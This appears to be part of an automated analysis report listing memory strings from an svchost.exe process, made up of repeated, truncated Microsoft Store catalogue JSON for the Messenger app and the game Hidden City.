                Source: svchost.exe, 00000012.00000003.356055531.0000026966965000.00000004.00000001.sdmpString found in binary or memory: t enough. \r\n\r\nSHARE WITH FRIENDS \r\nSend photos and videos to keep your close friends up to speed. Receive files for even more productivity. \r\n\r\nPrivacy Policy: https://www.facebook.com/about/privacy/ \r\nLEARN MORE at: http://messenger.com","ProductTitle":"Messenger","SearchTitles":[],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9WZDNCRF0083","Properties":{"PackageFamilyName":"Facebook.317180B0BB486_8xx8rvfyw5nnt","PackageIdentityName":"FACEBOOK.317180B0BB486","PublisherCertificateName":"CN=6E08453F-9BA7-4311-999C-D22FBA2FB1B8","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"c6a9fa5c-20a2-4e12-904d-edd408657dc8"},{"IdType":"LegacyWindowsPhoneProductId","Value":"3219d30d-4a23-4f58-a91c-c44b04e6a0c7"},{"IdType":"XboxTitleId","Value":"2004208728"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2020-09-23T01:40:51.0338882Z||.||d78822b5-4d6c-49fa-a7d8-5bd164a99315||1152921505691739511||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku":{"LastModifiedDate":"2020-09-23T01:39:26.3005240Z","LocalizedProperties":[{"SkuDescription":"Made for big screens and close connections. Get access to free texting, and high-quality voice & video chat built specifically for desktop.\r\n\r\nNEW! GET THE GROUP TOGETHER WITH ROOMS\r\nSend a link to group video chat with anyone, even if they don't have Messenger
                Source: svchost.exe, 00000012.00000003.353826978.000002696697C000.00000004.00000001.sdmpString found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"finding game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSource"
                Source: svchost.exe, 00000012.00000003.353826978.000002696697C000.00000004.00000001.sdmpString found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"finding game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSource"
                Source: svchost.exe, 00000012.00000003.353826978.000002696697C000.00000004.00000001.sdmpString found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"finding game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSource"
                Source: svchost.exe, 00000012.00000003.353826978.000002696697C000.00000004.00000001.sdmpString found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","SkuTitle":"Hidden City: Hidden Object Adventure","Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NBLGGH6J6VK","Properties":{"FulfillmentData":{"ProductId":"9NBLGGH6J6VK","WuCategoryId":"e15668ee-9cc1-4bc2-ba76-e91eb1a11e95","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","SkuId":"0011"},"FulfillmentType":null,"FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"App"}],"Architectures":["x86"],"Capabilities":["internetClient"],"ExperienceIds":[],"MaxDownloadSizeInBytes":379001925,"PackageFormat":"AppxBundle","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","MainPackageFamilyNameForDlc":null,"PackageFullName":"828B5831.HiddenCityMysteryofShadows_1.36.3602.0_neutral_~_ytsefhwckbdv6","PackageId":"2302d9e6-8bf9-3916-e2c6-40e670081bbf-X86","PackageRank":30001,"PlatformDependencies":[{"MaxTested":2814750931222528,"MinVersion":2814750438195200,"PlatformName":"Windows.Universal"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.bundledPackages\":[\"828B5831.HiddenCityMysteryofShadows_1.36.3602.0_x86__ytsefhwckbdv6\"],\"content.isMain\":false,\"content.packageId\":\"828B5831.HiddenCityMysteryofShadows_1.36.3602.0_neutral_~_ytsefhwckbdv6\",\"content.productId\":\"94ad5279-e84a-4d40-b7cf-c6f16f916e6c\",\"content.targetPlatforms\":[{\"plat
                Source: svchost.exe, 00000012.00000003.353826978.000002696697C000.00000004.00000001.sdmpString found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","SkuTitle":"Hidden City: Hidden Object Adventure","Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NBLGGH6J6VK","Properties":{"FulfillmentData":{"ProductId":"9NBLGGH6J6VK","WuCategoryId":"e15668ee-9cc1-4bc2-ba76-e91eb1a11e95","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","SkuId":"0011"},"FulfillmentType":null,"FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"App"}],"Architectures":["x86"],"Capabilities":["internetClient"],"ExperienceIds":[],"MaxDownloadSizeInBytes":379001925,"PackageFormat":"AppxBundle","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","MainPackageFamilyNameForDlc":null,"PackageFullName":"828B5831.HiddenCityMysteryofShadows_1.36.3602.0_neutral_~_ytsefhwckbdv6","PackageId":"2302d9e6-8bf9-3916-e2c6-40e670081bbf-X86","PackageRank":30001,"PlatformDependencies":[{"MaxTested":2814750931222528,"MinVersion":2814750438195200,"PlatformName":"Windows.Universal"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.bundledPackages\":[\"828B5831.HiddenCityMysteryofShadows_1.36.3602.0_x86__ytsefhwckbdv6\"],\"content.isMain\":false,\"content.packageId\":\"828B5831.HiddenCityMysteryofShadows_1.36.3602.0_neutral_~_ytsefhwckbdv6\",\"content.productId\":\"94ad5279-e84a-4d40-b7cf-c6f16f916e6c\",\"content.targetPlatforms\":[{\"plat
                Source: svchost.exe, 00000012.00000003.353826978.000002696697C000.00000004.00000001.sdmpString found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","SkuTitle":"Hidden City: Hidden Object Adventure","Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NBLGGH6J6VK","Properties":{"FulfillmentData":{"ProductId":"9NBLGGH6J6VK","WuCategoryId":"e15668ee-9cc1-4bc2-ba76-e91eb1a11e95","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","SkuId":"0011"},"FulfillmentType":null,"FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"App"}],"Architectures":["x86"],"Capabilities":["internetClient"],"ExperienceIds":[],"MaxDownloadSizeInBytes":379001925,"PackageFormat":"AppxBundle","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","MainPackageFamilyNameForDlc":null,"PackageFullName":"828B5831.HiddenCityMysteryofShadows_1.36.3602.0_neutral_~_ytsefhwckbdv6","PackageId":"2302d9e6-8bf9-3916-e2c6-40e670081bbf-X86","PackageRank":30001,"PlatformDependencies":[{"MaxTested":2814750931222528,"MinVersion":2814750438195200,"PlatformName":"Windows.Universal"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.bundledPackages\":[\"828B5831.HiddenCityMysteryofShadows_1.36.3602.0_x86__ytsefhwckbdv6\"],\"content.isMain\":false,\"content.packageId\":\"828B5831.HiddenCityMysteryofShadows_1.36.3602.0_neutral_~_ytsefhwckbdv6\",\"content.productId\":\"94ad5279-e84a-4d40-b7cf-c6f16f916e6c\",\"content.targetPlatforms\":[{\"plat
                Source: svchost.exe, 00000012.00000003.353884383.00000269669B9000.00000004.00000001.sdmpString found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"finding game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":
                Source: svchost.exe, 00000012.00000003.353884383.00000269669B9000.00000004.00000001.sdmpString found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"finding game journey 